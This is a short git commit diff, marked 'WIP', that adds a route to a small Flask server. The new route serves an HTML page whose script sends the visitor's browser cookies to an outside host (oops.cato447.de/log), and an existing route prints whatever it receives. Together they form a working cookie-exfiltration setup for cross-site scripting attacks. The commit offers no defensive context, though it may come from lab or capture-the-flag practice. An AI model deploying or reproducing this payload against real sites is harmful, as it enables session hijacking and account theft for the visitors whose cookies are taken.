WIP
This commit is contained in:
@@ -6,5 +6,18 @@ def log():
|
||||
print(request.args.get("c"))
|
||||
return "", 204
|
||||
|
||||
@app.route("/payload")
|
||||
def payload():
|
||||
print("Sending payload")
|
||||
return """<!DOCTYPE html>
|
||||
<html>
|
||||
<body>
|
||||
<script>
|
||||
new Image().src = 'http://oops.cato447.de/log?c=' + document.cookie;
|
||||
</script>
|
||||
</body>
|
||||
</html>"""
|
||||
|
||||
app.run(host="0.0.0.0", port=8025)
|
||||
|
||||
|
||||
|
||||
Reference in New Issue
Block a user